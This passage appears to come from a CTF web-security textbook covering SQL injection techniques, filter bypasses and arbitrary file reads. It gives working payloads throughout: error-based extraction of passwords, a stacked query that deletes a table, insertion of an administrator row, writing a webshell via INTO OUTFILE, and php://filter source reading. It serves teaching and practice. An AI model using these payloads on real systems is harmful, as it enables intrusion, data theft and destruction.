    $res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id = '".$_GET['id']."'") OR VAR_DUMP(mysqli_error($conn)); // Display the error
    $row = mysqli_fetch_array($res);
    echo "<center>";
    echo "<h1>".$row['title']."</h1>";
    echo "<br>";
    echo "<h1>".$row['content']."</h1>";
    echo "</center>";
?>

This attack type is called error-type SQL injection because MySQL's error message is displayed after execution, as shown in Fig. 1.42.

Fig. 1.42
figure 42

Result

As you can see from the documentation, the second parameter of the updatexml() function should be a legal XPATH path when it is executed. Otherwise, it will output the incoming parameter while raising an error, as shown in Fig. 1.43.

Fig. 1.43 Result

Taking advantage of this behavior, when errors are displayed we can pass the sensitive information we want as the second parameter of the updatexml() function. Visit http://192.168.20.133/sql3.php?id=1' or updatexml(1, concat(0x7e,(select pwd from wp_user)),1)%23; the result is shown in Fig. 1.44.

Fig. 1.44 Result
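Once the error text appears in the response, the leaked value can be pulled out mechanically. The sketch below is a hedged example: leaked_value() is a hypothetical helper, and the sample page text is made up for illustration. It relies on the "XPATH syntax error" message that MySQL raises for an invalid XPath argument, with the 0x7e ("~") marker from the payload used to locate the data.

```python
import re

def leaked_value(page: str, marker: str = "~"):
    """Return the text that follows the marker in an XPATH error, or None."""
    pattern = r"XPATH syntax error: '" + re.escape(marker) + r"(.*)'"
    match = re.search(pattern, page)
    return match.group(1) if match else None

# Made-up response body for illustration only.
sample_page = "XPATH syntax error: '~example_pwd'"
print(leaked_value(sample_page))
print(leaked_value("<h1>normal page</h1>"))
```

The error string is commonly observed to be cut off at roughly 32 characters, so longer values usually have to be read in slices with mid() or substr(), which is an assumption worth verifying on the target version.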

In addition, when the target server allows multiple statements to be executed in one query, arbitrary database data can be modified by appending further statements. This type of injection is called stacked SQL injection.

The source code is shown in sql4.php.

sql4.php
<?php
$db = new PDO("mysql:host=localhost:3306;dbname=test", 'root', 'root');
$sql = "SELECT title, content FROM wp_news WHERE id='".$_GET['id']."'";
try {
    foreach ($db->query($sql) as $row) {
        print_r($row);
    }
} catch (PDOException $e) {
    echo $e->getMessage();
    die();
}
?>

In this situation, any SQL statement can be executed after closing the single quote. For example, visit http://192.168.20.133/sql4.php?id=1%27;delete%20%20from%20wp_files;%23 in a browser. The result is shown in Fig. 1.45: all data in the table wp_files has been deleted.

Fig. 1.45 Result

This section introduced numeric SQL injection, UNION injection, Boolean-blind injection, time-blind injection, and Error-type injection as the basis for advanced SQL injection. Ranked by how easily they leak data, these techniques are ordered as follows: UNION injection > Error-type injection > Boolean-blind injection > time-blind injection.

Stacked injection is excluded from this ranking, as it usually has to be combined with other techniques to obtain data.

1.2.2 Injection Points

This section discusses SQL injection techniques for different injection point locations, based on the syntax of the SQL statements involved.

1.2.2.1 SELECT Injection

The SELECT statement is used to query data records and is often used to render pages, such as displaying news content. The syntax of the SELECT statement is as follows.

SELECT
    [ALL | DISTINCT | DISTINCTROW]
    [HIGH_PRIORITY]
    [STRAIGHT_JOIN]
    [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
    [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
      [PARTITION partition_list]
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position} [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position} [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

  1. Injection point at select_expr

The source code is shown in sqln1.php.

sqln1.php
<?php
$conn = mysqli_connect("127.0.0.1", "root", "root", "test");
$res = mysqli_query($conn, "SELECT ${_GET['id']}, content FROM wp_news");
$row = mysqli_fetch_array($res);
echo "<center>";
echo "<h1>".$row['title']."</h1>";
echo "<br>";
echo "<h1>".$row['content']."</h1>";
echo "</center>";
?>

In this situation, you can use the time-blind injection method from Sect. 1.2.1.2 to fetch the sensitive data, but MySQL syntax offers a better way: use the AS alias keyword so that the query result is displayed directly on the page. Visit http://192.168.20.133/sqln1.php?id=(select%20pwd%20from%20wp_user)%20as%20title; see Fig. 1.46.

Fig. 1.46 Result

  2. Injection point at table_reference

Replace the SQL query statement above with the following.

$res = mysqli_query($conn, "SELECT title FROM ${_GET['table']}");

We can still retrieve the data directly using aliases, such as

SELECT title FROM (SELECT pwd AS title FROM wp_user)x;

Of course, if you do not know the exact table name, you can fetch table names from the information_schema.tables table first.

For select_expr and table_reference injection points, the quotes must be closed first if the user input is wrapped in quotes. Readers can test the specific statements locally.
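Both alias tricks can be tried locally without a MySQL server. The sketch below uses Python's built-in sqlite3 module as a stand-in (an assumption: SQLite accepts the same alias syntax for these two statements, but it is not MySQL), with made-up table contents. The two query builders imitate the string concatenation in the PHP examples.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE wp_news (title TEXT, content TEXT);
    CREATE TABLE wp_user (user TEXT, pwd TEXT);
    INSERT INTO wp_news VALUES ('hello', 'first post');
    INSERT INTO wp_user VALUES ('admin', 'example_pwd');
""")

def select_expr_query(user_input: str) -> str:
    # Same concatenation pattern as sqln1.php.
    return f"SELECT {user_input}, content FROM wp_news"

def table_ref_query(user_input: str) -> str:
    # Same concatenation pattern as the table_reference example.
    return f"SELECT title FROM {user_input}"

row1 = conn.execute(
    select_expr_query("(select pwd from wp_user) as title")
).fetchone()
row2 = conn.execute(
    table_ref_query("(SELECT pwd AS title FROM wp_user) x")
).fetchone()

# In both cases the column that the page prints as "title" now holds pwd.
print(row1[0], row2[0])
```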

  3. The injection point is after WHERE or HAVING.

The SQL query statement is as follows.

$res = mysqli_query($conn, "SELECT title FROM wp_news WHERE id = ${_GET['id']}");

This situation has already been discussed in Sect. 1.2.1, Injection Basics, and is the most common one encountered in real-world applications.

The situation is similar for an injection point after HAVING.

  4. The injection point is after GROUP BY or ORDER BY.

When the injection point is not after WHERE, first experiment in a local MySQL environment to find out what can legally follow that position in the statement, and then construct the injection accordingly. Assume the following code.

$res = mysqli_query($conn, "SELECT title FROM wp_news GROUP BY ${_GET['title']}");

Testing shows that title=id desc,(if(1,sleep(1),1)) delays the response by 1 second, so time-blind injection can be used to obtain the sensitive data.

Cases like this remain widespread even though most developers have become security-conscious, mainly because prepared (pre-compiled) statements cannot bind identifiers such as column names or the sort order, so such parameters cannot be protected that way when writing system frameworks. These injections can be prevented by simply whitelisting the input values.
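A whitelist for sort parameters can be very small. The following is a sketch under stated assumptions: the column names in ALLOWED_COLUMNS are hypothetical, and order_clause() is an illustrative helper rather than part of any framework.

```python
ALLOWED_COLUMNS = {"id", "title", "content"}  # assumed column names
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

def order_clause(column: str, direction: str = "ASC") -> str:
    """Return an ORDER BY clause built only from whitelisted values."""
    direction = direction.upper()
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unexpected sort parameter")
    return f"ORDER BY {column} {direction}"

print(order_clause("title", "desc"))
try:
    order_clause("id desc,(if(1,sleep(1),1))")
except ValueError as exc:
    print("rejected:", exc)
```

Because the clause is assembled only from values that appear in the two sets, the payload from the text never reaches the SQL string.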

  5. The injection point is after LIMIT.

Changing the LIMIT number makes the page show more or fewer records. Because of syntax restrictions, the character-based injection methods described earlier are not suitable here (only numbers can be injected after LIMIT). Instead, based on the SELECT syntax, we can try injecting with the PROCEDURE keyword, which is only available in versions of MySQL before 5.6; see Fig. 1.47.

Fig. 1.47 Result

It is also possible to inject based on time, as follows.

PROCEDURE analyse((SELECT extractvalue(1, concat(0x3a, (IF(MID(VERSION(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1)

The BENCHMARK statement takes about 1 second to execute. Where we have write permission, we can also use the INTO OUTFILE keyword to write a webshell into the web directory. The query is SELECT xx INTO outfile "/tmp/xxx.php" LINES TERMINATED BY '<?php phpinfo();?>'; see Fig. 1.48.

Fig. 1.48 Result

1.2.2.2 INSERT Statement Injection

The INSERT statement inserts records into a table. In web applications it is typically used when news is added, users sign up, comments are posted on articles, and so on. The syntax of the INSERT statement is as follows.

INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]
    [INTO] tbl_name
    [PARTITION (partition_name [, partition_name] ...)]
    [(col_name [, col_name] ...)]
    {VALUES | VALUE} (value_list) [, (value_list)] ...
    [ON DUPLICATE KEY UPDATE assignment_list]

INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]
    [INTO] tbl_name
    [PARTITION (partition_name [, partition_name] ...)]
    SET assignment_list
    [ON DUPLICATE KEY UPDATE assignment_list]

INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]
    [INTO] tbl_name
    [PARTITION (partition_name [, partition_name] ...)]
    [(col_name [, col_name] ...)]
    SELECT ...
    [ON DUPLICATE KEY UPDATE assignment_list]

Usually, the injection point is located in the field name or field value, and there is no response message after the execution of the INSERT statement.

  1. The injection point is located at tbl_name.

If the rest of the statement can be commented out with a comment character, specific data can be inserted directly into a table of your choice, such as the administrator table. Consider the following SQL statement.

$res = mysqli_query($conn, "INSERT INTO {$_GET['table']} VALUES(2,2,2,2)");

The developer intends the table parameter to be wp_news so that records are inserted into the news table. Since we control the table name, we can visit http://192.168.20.132/insert.php?table=wp_user values(2,'newadmin','newpass')%23. Fig. 1.49 shows the contents of the wp_user table before and after the request: a new administrator record has been inserted.

Fig. 1.49 Result

  2. The injection point is located in VALUES.

Assume the following SQL statement.

INSERT INTO wp_user VALUES(1, 1, 'controllable location');

You can close the single quote and then insert another record. Usually, the administrator and the regular user are in the same table. The injection statement is as follows.

INSERT INTO wp_user VALUES(1, 0, '1'), (2, 1, 'aaaa');

An administrator user can be inserted if the second field of the user table represents the administrator privilege flag. In some cases, we can also insert data into a field that can be displayed back to the user to get the data quickly. Assuming that the data from the last field will be displayed on the page, the first user's password can be injected using the following statement.

INSERT INTO wp_user VALUES(1, 1, '1'), (2, 2, (SELECT pwd FROM wp_user LIMIT 1));
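The multi-row VALUES trick can be reproduced locally. The sketch below again uses sqlite3 as a stand-in for MySQL (an assumption), and the three-column layout of wp_user (id, administrator flag, name) is hypothetical, chosen to match the description of the second field above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE wp_user (id INTEGER, is_admin INTEGER, name TEXT)")

def insert_statement(name: str) -> str:
    # Vulnerable pattern: the last value is concatenated inside quotes.
    return f"INSERT INTO wp_user VALUES(1, 0, '{name}')"

# Close the quote and the first row, then open a second row.
payload = "1'), (2, 1, 'aaaa"
sql = insert_statement(payload)
conn.execute(sql)

rows = conn.execute(
    "SELECT id, is_admin, name FROM wp_user ORDER BY id"
).fetchall()
print(sql)
print(rows)
```

The single request leaves two rows in the table, the second of which carries the administrator flag.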

1.2.2.3 UPDATE Injection

The UPDATE statement is used for updating database records, such as users modifying their articles, personal information, etc. The syntax of the UPDATE statement is as follows.

UPDATE [LOW_PRIORITY] [IGNORE] table_reference
    SET assignment_list
    [WHERE where_condition]
    [ORDER BY ...]
    [LIMIT row_count]

value:
    {expr | DEFAULT}

assignment:
    col_name = value

assignment_list:
    assignment [, assignment] ...

Take the case where the injection point is after SET. A normal UPDATE statement is shown in Fig. 1.50; the id value in row 2 of the original wp_user table has been modified.

Fig. 1.50 Result

When the id value is controllable, multiple fields can be modified, as follows.

UPDATE wp_user SET id=3, user='xxx' WHERE user = '23';

The methods to exploit the rest of the injection points are similar to injection methods of SELECT statements.

1.2.2.4 DELETE Injection

Most of the DELETE injections come after the WHERE keyword. Suppose the SQL statement is as follows.

$res = mysqli_query($conn, "DELETE FROM wp_news WHERE id = {$_GET['id']}");

The purpose of the DELETE statement is to delete all data from a table or only the specified rows. Careless injection into the id parameter can make the condition after WHERE evaluate to true, so that all data in wp_news is deleted; see Fig. 1.51.

Fig. 1.51 Result

To avoid disturbing normal data, it is common to append and sleep(1). Since sleep() returns 0, the WHERE condition evaluates to false and no rows are deleted, while the delay still reveals the injection; see Fig. 1.52.

Fig. 1.52 Result

1.2.3 Injection and Defense

This section will cover common defenses and several ways to bypass them, focusing on providing readers with ideas for bypasses.

1.2.3.1 Character Substitution

To defend against SQL injection, some developers simply strip keywords such as SELECT and FROM from requests, or block requests that contain them.

  1. Filter spaces

When spaces are filtered, %0a, %0b, %0c, %0d, %09, %a0 (all URL-encoded; %a0 works only with certain character sets), the comment sequence /**/, parentheses, and so on can be used in place of spaces. Suppose the PHP source code is as follows.

<?php
$conn = mysqli_connect("127.0.0.1", "root", "root", "test");
$id = $_GET['id'];
echo "before replace id: $id";
$id = str_replace(" ", "", $id); // Remove spaces
echo "after replace id: $id";
$sql = "SELECT title, content FROM wp_news WHERE id=".$id;
$res = mysqli_query($conn, $sql);
$row = mysqli_fetch_array($res);
echo "<center>";
echo "<h1>".$row['title']."</h1>";
echo "<br>";
echo "<h1>".$row['content']."</h1>";
echo "</center>";
?>

With the previous payload, the SQL query fails because the spaces are stripped, and the title is not shown on the page (see Fig. 1.53). Replace the spaces in the payload with "%09"; the result is shown in Fig. 1.54.

Fig. 1.53 Result

Fig. 1.54 Result
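The effect of the filter can be checked offline. This sketch mirrors str_replace(" ", "", $id) with Python's str.replace(); the payload "-1 union select 1,2" is an assumed example of "the previous payload", not taken from the figures.

```python
from urllib.parse import unquote

def strip_spaces(value: str) -> str:
    """Python equivalent of PHP's str_replace(" ", "", $id)."""
    return value.replace(" ", "")

with_spaces = unquote("-1%20union%20select%201,2")
with_tabs = unquote("-1%09union%09select%091,2")

print(repr(strip_spaces(with_spaces)))  # keywords run together
print(repr(strip_spaces(with_tabs)))    # tabs survive the filter
```

The first result is no longer valid SQL, while the second still separates its tokens with tab characters, which MySQL treats as whitespace.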

  2. Filter SELECT

When SELECT is replaced with an empty string, the keyword can be nested, as in SESELECTLECT: once the filter removes the inner SELECT, the remaining characters form SELECT again. Note that str_replace() is case-sensitive, so the nested keyword must use the same case as the filtered string.

In the code above, replace

$id = str_replace(" ", "", $id);

with

$id = str_replace("select", "", $id);

Visit http://192.168.20.132/replace.php?id=-1%09union%09selselectect%091,2 and see Fig. 1.55 for the result.

Fig. 1.55 Result
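The nesting bypass works because the removal is applied only once. The sketch below imitates a single-pass, case-sensitive replacement (as PHP's str_replace() performs) and contrasts it with a hypothetical strip_until_stable() variant that repeats the removal; both helper names are illustrative, and the filtered keyword is assumed to be lowercase to match the payload.

```python
def strip_keyword(value: str, keyword: str = "select") -> str:
    """Single-pass, case-sensitive removal, like PHP's str_replace()."""
    return value.replace(keyword, "")

def strip_until_stable(value: str, keyword: str = "select") -> str:
    """Repeat the removal until nothing changes (still case-sensitive)."""
    previous = None
    while previous != value:
        previous, value = value, value.replace(keyword, "")
    return value

payload = "-1\tunion\tselselectect\t1,2"
print(repr(strip_keyword(payload)))        # the keyword reappears
print(repr(strip_until_stable(payload)))   # the keyword is gone
print(repr(strip_keyword("-1\tunion\tSeLeCt\t1,2")))  # mixed case slips through
```

Even the repeated variant is defeated by mixed case, which is why keyword stripping is a weak defense compared with parameterized queries.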

  3. Case matching

In MySQL, the keywords are not case sensitive, so if only “SELECT” is matched, it can be easily bypassed by using mixed case, such as “sEleCT”.

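  4. Regular expression matching

A regular-expression filter such as "\bselect\b" can be bypassed with a MySQL version comment such as "/*!50000select*/": there is no word boundary between "0" and "s", so the pattern does not match, yet MySQL still executes the keyword; see Fig. 1.56.

Fig. 1.56 Result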
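The word-boundary behavior is easy to confirm with Python's re module, whose \b has the same meaning here as in PCRE. This is only a sketch of the filter logic; the blocked() helper is hypothetical.

```python
import re

FILTER = re.compile(r"\bselect\b", re.IGNORECASE)

def blocked(value: str) -> bool:
    """Return True when the keyword filter would reject the input."""
    return FILTER.search(value) is not None

print(blocked("-1 union select 1,2"))            # True
print(blocked("-1 union/*!50000select*/1,2"))    # False
```

In the second input, "select" is preceded by the digit "0", which is a word character, so no boundary exists before the keyword and the pattern never matches.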

  5. Single or double quotation marks are filtered, but the backslash is overlooked.

Suppose the following injection points are encountered.

$sql = "SELECT * FROM wp_news WHERE id = 'controllable 1' AND title = 'controllable 2'"

The following statements can be constructed to bypass the filter.

$sql = "SELECT * FROM wp_news WHERE id = 'a\' AND title = 'OR sleep(1)#'"

The backslash supplied at controllable point 1 escapes the closing single quote of that field, so the string runs on until the opening quote of controllable point 2, and the content of controllable point 2 falls outside the quotes; see Fig. 1.57.

Fig. 1.57 Result

As you can see, sleep() was executed successfully, indicating that the content at controllable point 2 has escaped the quotes. Sensitive information can then be obtained using UNION injection; see Fig. 1.58.

Fig. 1.58 Result

1.2.3.2 Escape Quotes

The key to SQL injection is breaking out of the quotes, so developers often apply addslashes() to all user input globally, i.e., prefix characters such as single quotes and backslashes with a backslash, turning "'" into "\'". In this case, SQL injection may seem impossible, but the defense can still be broken under certain conditions.

  1. Encoding and decoding

Developers often use decoding functions such as urldecode and base64_decode, or custom encryption/decryption functions. When the user's input passes through addslashes() it is still encoded, so the quotes inside it are not escaped; if the input is then decoded and concatenated directly into the SQL statement, SQL injection results. Wide-byte injection is a classic case of injection caused by character set conversion. Interested readers can consult the relevant documents to learn more.

  2. Unexpected input points

For example, in PHP, developers often overlook inputs such as the name of an uploaded file, the HTTP headers, and $_SERVER['PHP_SELF']. These variables are then left unfiltered, which leads to injection.

  3. Secondary injection

The root cause of secondary injection is that the developer trusts data taken out of the database to be harmless. Suppose the current data table is as shown in Fig. 1.59, and the user name admin'or'1 entered by the user is escaped as admin\'or\'1, so the SQL statement is as follows.

INSERT INTO wp_user VALUES(2, 'admin\'or\'1', 'some_pass');

Fig. 1.59 Result

At this point, the quotes are escaped and no injection occurs, so the data is stored in the database normally; see Fig. 1.60.

Fig. 1.60 Result

However, the user name is later used again (usually for session information), as in the following code.

<?php
$conn = mysqli_connect("127.0.0.1", "root", "root", "test");
$res = mysqli_query($conn, "SELECT username FROM wp_user WHERE id=2");
$row = mysqli_fetch_array($res);
$name = $row["username"];
$res = mysqli_query($conn, "SELECT password FROM wp_user WHERE username='$name'");
?>

When the name is concatenated into the SQL statement, the statement becomes the following, which produces SQL injection.

SELECT password FROM wp_user WHERE username = 'admin' or'1';
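The two-step nature of secondary injection can be reproduced with sqlite3 as a local stand-in for MySQL (an assumption; the table contents are made up). The first step stores the name safely through a bound parameter, and the second step shows what happens when the stored value is concatenated, compared with binding it again.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE wp_user (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO wp_user VALUES (1, 'admin', 'admin_pass')")
# Step 1: the malicious name is stored without causing injection.
conn.execute(
    "INSERT INTO wp_user VALUES (?, ?, ?)", (2, "admin'or'1", "some_pass")
)

# Step 2: the stored value is read back and trusted.
name = conn.execute("SELECT username FROM wp_user WHERE id = 2").fetchone()[0]

unsafe_sql = f"SELECT password FROM wp_user WHERE username = '{name}'"
unsafe_rows = conn.execute(unsafe_sql).fetchall()
safe_rows = conn.execute(
    "SELECT password FROM wp_user WHERE username = ?", (name,)
).fetchall()

print(unsafe_sql)
print(len(unsafe_rows), "rows via concatenation")
print(safe_rows)
```

The concatenated query matches every row because the trailing or'1' is always true, whereas the bound query returns only the row that actually has that user name.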

  4. String truncation

For fields such as headers and titles, developers may limit the length to 10 characters and truncate anything beyond that. For example, the PHP code is as follows.

<?php
$conn = mysqli_connect("127.0.0.1", "root", "root", "test");
$title = addslashes($_GET['title']);
$title = substr($title, 0, 10); // Truncate to 10 characters
echo "<center>$title</center>";
$content = addslashes($_GET['content']);
$sql = "INSERT INTO wp_news VALUES(2, '$title', '$content')";
$res = mysqli_query($conn, $sql);
?>

Suppose an attacker enters "aaaaaaaaa'", which addslashes() turns into "aaaaaaaaa\'" and the length limit then truncates to "aaaaaaaaa\". The trailing backslash escapes the closing single quote of the title, so the content parameter becomes injectable. Using the VALUES injection method, visit http://192.168.20.132/insert2.php?title=aaaaaaaaa'&content=,1,1),(3,4,(select%20pwd%20from%20wp_user%20limit%201),1)%23; two rows have been added to the table wp_news, see Fig. 1.61.

Fig. 1.61 Result
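The interaction between escaping and truncation can be traced step by step. The addslashes() function below is a rough Python approximation of the PHP function (an assumption covering only quotes, backslashes, and NUL), and the content value is shortened for readability.

```python
def addslashes(value: str) -> str:
    """Rough equivalent of PHP's addslashes()."""
    out = []
    for ch in value:
        if ch == "\0":
            out.append("\\0")
            continue
        if ch in ("'", '"', "\\"):
            out.append("\\")
        out.append(ch)
    return "".join(out)

escaped = addslashes("aaaaaaaaa'")   # 11 characters: the quote gained a backslash
title = escaped[:10]                 # substr($title, 0, 10) keeps only the backslash
content = addslashes(",1,1)#")
sql = f"INSERT INTO wp_news VALUES(2, '{title}', '{content}')"

print(escaped)
print(title)
print(sql)
```

In the final statement, the backslash left at the end of the title escapes the quote that was meant to close it, so the text of content is parsed as SQL rather than as a string.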

1.2.4 Impacts of Injection

We have covered the basics of SQL injection and ways to bypass it, so what are the impacts of injection? The following is a summary of the author's experience in the field.

  • If you have write permission, you can use INTO OUTFILE or DUMPFILE to write directly into a web directory, or write a file and then combine it with a file inclusion vulnerability to achieve code execution; see Fig. 1.62.

  • Use the load_file() function to read the source code and configuration information with file read permission to access sensitive data.

  • Elevate privileges, get higher user or administrator privileges, bypass logins, add users, adjust user permissions, etc., to have more management functionality on the target website.

  • Control the contents of files such as templates and caches through data injected into database queries, in order to obtain permissions or to delete or read specific critical files.

  • Control the entire database, including arbitrary data, arbitrary field lengths, etc., when multiple statements can be executed.

  • System commands can be executed directly in a database such as SQL Server.

Fig. 1.62 Result

1.2.5 SQL Injection Summary

This section introduces only the most basic SQL injection techniques seen in CTFs; actual competitions combine many features and functions. MySQL injection challenges can apply a variety of filters, and because of how SQL servers are implemented, the same functionality can often be achieved in several ways, so challenges may involve rarely used features. To solve such challenges, and to understand SQL injection principles better, it is important to consult the documentation for the specific SQL server, use fuzzing to find out which characters, functions, and keywords are filtered, look in the documentation for alternatives that provide the same functionality without containing the filtered keywords, and finally bypass the defenses.

Some platforms like sqli-labs (https://github.com/Audi-1/sqli-labs) provide injection challenges with different filter levels, covering most challenge points. By practicing and summarizing, we can always find the necessary combinations to solve the challenges in the competition.

1.3 Arbitrary File Read Vulnerability

An arbitrary file read vulnerability allows an attacker to read, by some means, files on the server that the developer did not intend to expose. Within the overall attack process, it is often a powerful supplementary method of information gathering: server configuration files, keys stored as files, server information (including information about running processes), command history, network information, application source code, and binary programs can all be snooped on by attackers through this vulnerability.

A file read vulnerability often means that the victim's server is about to be wholly controlled by the attacker. Of course, if the server is deployed strictly according to standard security specifications, it is difficult for an attacker to obtain valuable information even when the application has an exploitable file read vulnerability. File read vulnerabilities exist in almost every programming language in which web applications can be deployed. Here, "exist" does not point to a problem in the language itself but to omissions caused by developers not considering unexpected situations carefully enough.

Generally speaking, developers of web application frameworks or middleware care a great deal about code reusability, so some API interfaces are defined very openly to give secondary developers as much freedom as possible. In practice, many developers place too much trust in the security mechanisms implemented by the framework or middleware layer during secondary development. They rely on those mechanisms without understanding them carefully and develop against nothing more than brief API documentation. Unfortunately, framework or middleware developers may not document the implementation principles of API functions, the range of acceptable parameters, or foreseeable security issues.

Industry-recognized code bases are usually called "wheels", and programs can significantly reduce repetitive work by using them. If a "wheel" contains a vulnerability, its code is reused by many programmers and the vulnerability is passed on level by level. As more layers build on the underlying "wheel" code, the security risks in it become almost invisible to developers at the top of the call chain.

It is also a severe challenge for security personnel to patiently trace the call chain backward to its root cause as they dig into web application framework vulnerabilities.

In addition, there are arbitrary file read vulnerabilities that developers cannot control through code. They are often caused by problems in the web server itself or by insecure server configuration. The basic mechanism of a web server is to read code or resource files from the server, pass the code files to an interpreter or CGI program for execution, and then return the execution results and resource files to the client. Many of the file operations involved can be interfered with by attackers, resulting in unintended file reads or in code files being served as resource files.

1.3.1 Common Trigger Points for File Read Vulnerabilities

1.3.1.1 Web Application Languages

Different web languages have different trigger points for file reading vulnerabilities. This section takes different web file reading vulnerabilities as examples to introduce the specific vulnerability scenarios.

  1. PHP

The file-reading functions in the PHP standard library are not introduced in detail here. They include, but are not limited to: file_get_contents(), file(), fopen() (together with the file pointer functions fread(), fgets(), etc.), the file inclusion functions (include(), require(), include_once(), require_once(), etc.), and the functions that can read files by executing system commands from PHP (system(), exec(), etc.). These functions are very common in PHP applications, so auditors pay close attention to them throughout a PHP code audit.

Some readers may wonder: since these functions are so dangerous, why do developers pass dynamic input to them as parameters? The reason is that PHP development increasingly favors a single-entry, multi-level, multi-channel model, which involves intensive and frequent calls between PHP files. To write highly reusable file functions, developers need to pass some dynamic information (such as the dynamic part of a file name) to those functions (see Fig. 1.63). If the dynamic input is not constrained at the program entry, for example with a branch statement such as switch, an attacker can easily inject a malicious path and achieve arbitrary file reading or even arbitrary file inclusion.

Fig. 1.63 Code example

In addition to the standard library functions mentioned above, many common PHP extensions also provide functions that can read files. Examples include the php-curl extension, PHP modules that involve file access (database-related extensions, image-related extensions), and XML modules, which can lead to XXE. Few CTF challenges use external library functions to read arbitrary files. The subsequent chapters analyze the relevant challenges with examples.

Unlike other languages, PHP allows the file to be opened to be specified not only as a simple path but also as a stream. We can think of this as a set of protocols provided by PHP. For example, after entering http://host:port/xxx in the browser, you can request the corresponding file on the remote server through HTTP. PHP has many such protocols with different functions but similar forms, collectively called wrappers. The most typical one is the php:// protocol. More interestingly, PHP provides an interface for developers to write custom wrappers (stream_wrapper_register).

In addition to wrappers, another mechanism unique to PHP is the filter, whose function is to apply specific processing to the current wrapper (such as converting the contents of the current file stream to uppercase).

For custom wrappers, developers need to register filters through stream_filter_register. Moreover, some built-in wrappers in PHP come with filters, such as the php:// protocol, which has filters of the types shown in Fig. 1.64.

Fig. 1.64 Filters

PHP's Filter feature provides us with many conveniences for reading arbitrary files. Assuming that the path parameter of the include function on the server-side is controllable, it will parse the target file as a PHP file under normal circumstances. If there are PHP-related tags such as “<?php” in the parsed file, the content in the tag will be executed as PHP code.

If we directly pass the file name of this file containing PHP code to the include function, the PHP code cannot be leaked in the form of visual text because the PHP code is executed. However, this can be avoided by using Filter at this time.

For example, the more common Base64-related Filter can encode the file stream into the form of Base64 so that there will be no PHP tags in the content of the read file. More serious is that if the remote file inclusion option allow_url_include is enabled on the server, we can directly execute remote PHP code.
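The Base64 filter technique has two halves: building the stream path and decoding what comes back. The sketch below shows both, using the php://filter syntax with the convert.base64-encode filter. The helper names are hypothetical, the target file name index.php is an assumed example, and the response is simulated locally instead of being fetched from a server.

```python
import base64

def filter_path(resource: str) -> str:
    """Build a php://filter path that Base64-encodes the target stream."""
    return f"php://filter/read=convert.base64-encode/resource={resource}"

def decode_response(body: str) -> str:
    """Decode the Base64 text returned by the vulnerable include()."""
    return base64.b64decode(body).decode("utf-8", errors="replace")

# Simulated server output (assumption): Base64 of a small PHP file.
simulated = base64.b64encode(b"<?php $flag = 'example'; ?>").decode()

print(filter_path("index.php"))
print(decode_response(simulated))
```

Because the included stream no longer contains a literal "<?php" tag, the interpreter prints it as text, and the source is recovered on the client side by decoding.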

Of course, these Wrapper and Filter carried by PHP by default can be disabled through php.ini. It is recommended to read the source code of PHP about Wrapper and Filter to gain a deeper understanding of the relevant content.

In the real-world problems encountered about the inclusion of PHP files, we may encounter three situations: ① The file path is controllable in the front and uncontrollable at the back; ② The file path is controllable at the back and uncontrollable in the front; ③ The file path is controllable in the middle.

For the first case, you can truncate the path with "\x00" in older versions of PHP and of the container; the corresponding URL encoding is "%00". When the server has a file upload function, you can also use the zip:// or phar:// protocol to include the file directly and execute the PHP code.

For the second case, we can use "../" for directory traversal to read files directly, but wrappers cannot be used. If the server uses include or another file inclusion function, we will not be able to read the PHP code in a PHP file.

The third case is similar to the first, except that wrappers cannot be used for file inclusion.

  2. Python

Unlike PHP, Python web applications tend to start their own services through their modules and then present the whole application to the user through middleware and proxy services. The interaction between the user and the web application includes requests for server resource files, which makes unintended file reads easy. As a result, many arbitrary file read vulnerabilities appear in Python frameworks because there is no unified standard for serving resource files.

These vulnerabilities are usually found in the part of the framework that serves static resource files, where the open function eventually reads the file's contents. They are often caused by framework developers overlooking the behavior of Python functions such as os.path.join().

>>> os.path.join("/a","/b")
'/b'

Many developers check that the path passed by the user does not contain "." to prevent directory traversal when reading resources, and then pass the user's input as the second parameter of os.path.join(). However, if the user passes an absolute path beginning with "/", os.path.join() discards the first parameter, so the path is resolved from the root directory and any file can be read.
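The flawed check and one possible stricter alternative can be compared side by side. In this sketch BASE is a hypothetical resource directory, naive_resolve() reproduces the "no dots" check described above, and safer_resolve() is only one way to constrain the result (posixpath is used so the example behaves the same on any platform).

```python
import posixpath

BASE = "/srv/app/static"  # hypothetical resource directory

def naive_resolve(user_path: str) -> str:
    if "." in user_path:  # the flawed check described above
        raise ValueError("traversal attempt")
    return posixpath.join(BASE, user_path)

def safer_resolve(user_path: str) -> str:
    candidate = posixpath.normpath(posixpath.join(BASE, user_path))
    # Reject anything that no longer lives under BASE.
    if posixpath.commonpath([BASE, candidate]) != BASE:
        raise ValueError("path escapes the resource directory")
    return candidate

print(naive_resolve("/etc/passwd"))      # the base directory is discarded
print(safer_resolve("css/site.css"))
try:
    safer_resolve("/etc/passwd")
except ValueError as exc:
    print("rejected:", exc)
```

Note that normpath() does not resolve symbolic links; on a real filesystem, os.path.realpath() would be needed before the comparison.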

